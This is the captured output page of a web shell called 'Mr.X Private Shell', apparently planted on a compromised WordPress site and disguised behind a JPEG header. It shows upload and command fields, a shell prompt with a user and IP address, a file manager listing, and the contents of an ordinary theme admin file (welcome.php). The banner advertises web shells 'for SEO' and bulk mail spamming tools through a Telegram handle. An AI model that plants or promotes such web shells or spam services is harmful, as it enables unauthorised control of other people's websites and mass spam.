����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.144: ~ $
<?php
/**
 * @var Givelove_Theme_Admin $this
 * @var string $welcome
 */
$theme = wp_get_theme();
$this->get_tab_menu();


$data = array(
	'memory_limit'   => wp_convert_hr_to_bytes( @ini_get( 'memory_limit' ) ),
	'time_limit'     => ini_get( 'max_execution_time' ),
	'max_input_vars' => ini_get( 'max_input_vars' ),
);

$status = array(
	'fs'              => ( WP_Filesystem() ) ? true : false,
	'zip'             => class_exists( 'ZipArchive' ),
	'suhosin'         => extension_loaded( 'suhosin' ),
	'memory_limit'    => $data['memory_limit'] >= 268435456,
	'time_limit'      => ( ( $data['time_limit'] >= 180 ) || ( $data['time_limit'] == 0 ) ) ? true : false,
	'max_input_vars'  => $data['max_input_vars'] >= 5000,
	'plugin_required' => $this->get_plugins_require_count() > 0
);

?>
<div class="opal-wrap">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="box-import box-shadow mb-30">
                    <div class="row">
                        <div class="col-lg-8 col-md-12 d-flex align-items-center">
                            <div class="row">
                                <div class="col-lg-5 col-md-12">
                                    <div>
                                        <h3 class="large-title c-primary"><?php esc_html_e( 'Import Demo', 'konstruktic' ) ?></h3>
										<?php if ( $status['plugin_required'] ) { ?>
                                            <p class="text-description"><?php esc_html_e( 'Please check and make sure that all required plugins are set up on your website', 'konstruktic' ) ?></p>
                                            <a href="<?php echo esc_url( admin_url( 'admin.php?page=opal-theme-plugins' ) ); ?>"
                                               class="opal-btn-primary"><?php esc_html_e( 'Install Plugins', 'konstruktic' ) ?></a>
										<?php } else { ?>
                                            <p class="text-description"><?php esc_html_e( 'Clone a demo site in few clicks', 'konstruktic' ) ?></p>
                                            <a href="<?php echo esc_url( admin_url( 'admin.php?page=pt-one-click-demo-import' ) ); ?>"
                                               class="opal-btn-primary"><?php esc_html_e( 'Run Importer', 'konstruktic' ) ?></a>
										<?php } ?>
                                    </div>
                                </div>
                                <div class="col-lg-7 col-md-12">
                                    <img class="mw-100 pr-lg-3" src="<?php echo esc_url( $theme->get_screenshot() ); ?>"
                                         alt="Screenshots">
                                </div>
                            </div>
                        </div>
                        <div class="col-lg-4 col-md-12 bl-lg-so-1 d-flex align-items-center">
                            <div class="pl-lg-2">
                                <h2 class="medium-title pb-3 mt-lg-0"><?php esc_html_e( 'System Status', 'konstruktic' ) ?></h2>
                                <table class="table-check-status">
                                    <tbody>
                                    <tr>
                                        <td>WP File System</td>
                                        <td><span class="<?php echo esc_attr( $status['fs'] ? 'pass' : 'fail' ) ?>"></span></td>
                                        <td></td>
                                    </tr>
                                    <tr>
                                        <td>ZipArchive</td>
                                        <td><span class="<?php echo esc_attr( $status['zip'] ? 'pass' : 'fail' ) ?>"></span></td>
                                    </tr>
                                    <tr>
                                        <td>
                                            PHP Memory Limit
                                        </td>
                                        <td>
                                            <span class="<?php echo esc_attr( $status['memory_limit'] ? 'pass' : 'fail' ) ?>"></span>
                                        </td>
                                        <td><?php echo size_format( $data['memory_limit'] ); ?></td>
                                    </tr>
									<?php if ( $status['memory_limit'] ) { ?>
                                        <tr>
                                            <td colspan="3" class="status-messenger">
                                                <span class="status-rerequired">Current memory limit is OK, however <u>256 MB</u> is recommended.</span>
                                            </td>
                                        </tr>
									<?php } else { ?>
                                        <tr>
                                            <td colspan="3" class="status-messenger">
                                                <span class="status-rerequired">Minimum <u>128 MB</u> is required, <u>256 MB</u> is recommended. </span>
                                            </td>
                                        </tr>
									<?php } ?>
                                    <tr>
                                        <td>
                                            PHP Time Limit
                                        </td>
                                        <td>
                                            <span class="<?php echo esc_attr( $status['time_limit'] ? 'pass' : ( $data['time_limit'] >= 60 ) ? 'warning' : 'fail' ); ?>"></span>
                                        </td>
                                        <td><?php echo esc_html( $data['time_limit'] ); ?></td>
                                    </tr>
									<?php if ( $data['time_limit'] < 60 ) { ?>
                                        <tr>
                                            <td colspan="3" class="status-messenger">
                                                <span class="status-rerequired">Minimum <u>60</u> is required, <u>180</u> is recommended.</span>
                                            </td>
                                        </tr>
									<?php } elseif ( $data['time_limit'] < 180 ) { ?>
                                        <tr>
                                            <td colspan="3" class="status-messenger">
                                                <span class="status-rerequired">Current time limit is OK, however <u>180</u> is recommended. </span>
                                            </td>
                                        </tr>
									<?php } ?>
                                    <tr>
                                        <td>PHP Max Input Vars</td>
                                        <td>
                                            <span class="<?php echo esc_attr( $status['max_input_vars'] ? 'pass' : 'fail' ) ?>"></span>
                                        </td>
                                        <td><?php echo esc_html( $data['max_input_vars'] ) ?></td>
                                    </tr>
                                    </tbody>
                                </table>
                            </div>
                        </div>
                    </div>

                </div>
            </div>
            <div class="col-xl-4 col-lg-6 col-md-12 col-sm-12 text-center">
                <div class="box-content box-shadow mb-30">
                    <img class="img-auto"
                         src="<?php echo esc_url( get_theme_file_uri( 'inc/admin/images/support.png' ) ); ?>"
                         title="wp opal">
                    <h3><?php esc_html_e( 'Support Cover', 'konstruktic' ) ?></h3>
                    <p><?php esc_html_e( 'We’ll give you a reply within 24 hours except during weekends.', 'konstruktic' ) ?></p>
                    <div class="box-footer">
                        <a href="https://wpopal.ticksy.com/" target="_blank"
                           class="opal-btn-secondary mt-4"><?php esc_html_e( 'Submit Ticket', 'konstruktic' ) ?></a>
                    </div>
                </div>
            </div>

            <div class="col-xl-4 col-lg-6 col-md-12 col-sm-12 text-center">
                <div class="box-content box-shadow">
                    <img class="img-auto"
                         src="<?php echo esc_url( get_theme_file_uri( 'inc/admin/images/documentation.png' ) ); ?>"
                         title="wp opal">
                    <h3><?php esc_html_e( 'Documentation', 'konstruktic' ) ?></h3>
                    <p><?php esc_html_e( 'Read all documentation for our themes. Any questions or training needed for WordPress themes can be  found here.', 'konstruktic' ) ?></p>
                    <div class="box-footer">
                        <a href="<?php echo esc_url('http://source.wpopal.com/konstruktic/dummy_data/guide/') ?>" class="opal-btn-primary mt-4"><?php esc_html_e( 'Explore Now', 'konstruktic' ) ?></a>
                    </div>
                </div>
            </div>

            <div class="col-xl-4 col-lg-6 col-md-12 col-sm-12 text-center">
                <div class="box-content box-shadow">
                    <img class="img-auto"
                         src="<?php echo esc_url( get_theme_file_uri( 'inc/admin/images/information.png' ) ); ?>"
                         title="wp opal">
                    <h3><?php esc_html_e( 'Our Information', 'konstruktic' ) ?></h3>
                    <p><?php esc_html_e( 'Checkout our site and social for more information.', 'konstruktic' ) ?></p>
                    <a href="https://www.wpopal.com/"
                       class="mb-3"><?php esc_html_e( 'www.wpopal.com', 'konstruktic' ); ?></a>
                    <div class="box-footer social">
                        <ul class="list-social">
                            <li>
                                <a href="https://themeforest.net/user/opal_wp">
                                    <img src="<?php echo esc_url( get_theme_file_uri( 'inc/admin/images/social/evanto.png' ) ); ?>"
                                         alt="Envato">
                                </a>
                            </li>
                            <li>
                                <a href="https://www.facebook.com/opalwordpress/">
                                    <img src="<?php echo esc_url( get_theme_file_uri( 'inc/admin/images/social/facebook.png' ) ); ?>"
                                         alt="Facebook">
                                </a>
                            </li>
                            <li>
                                <a href="https://twitter.com/opalwordpress">
                                    <img src="<?php echo esc_url( get_theme_file_uri( 'inc/admin/images/social/twiter.png' ) ); ?>"
                                         alt="Tweeter">
                                </a>
                            </li>
                            <li>
                                <a href="https://www.youtube.com/channel/UCEVKfaT81jFq4HE1Yky99GA">
                                    <img src="<?php echo esc_url( get_theme_file_uri( 'inc/admin/images/social/youtube.png' ) ); ?>"
                                         alt="Youtube">
                                </a>
                            </li>
                            <li>
                                <a href="mailto:info@wpopal.com">
                                    <img src="<?php echo esc_url( get_theme_file_uri( 'inc/admin/images/social/email.png' ) ); ?>"
                                         alt="Email">
                                </a>
                            </li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
changelog.php File 939 B 0644
welcome.php File 11.61 KB 0644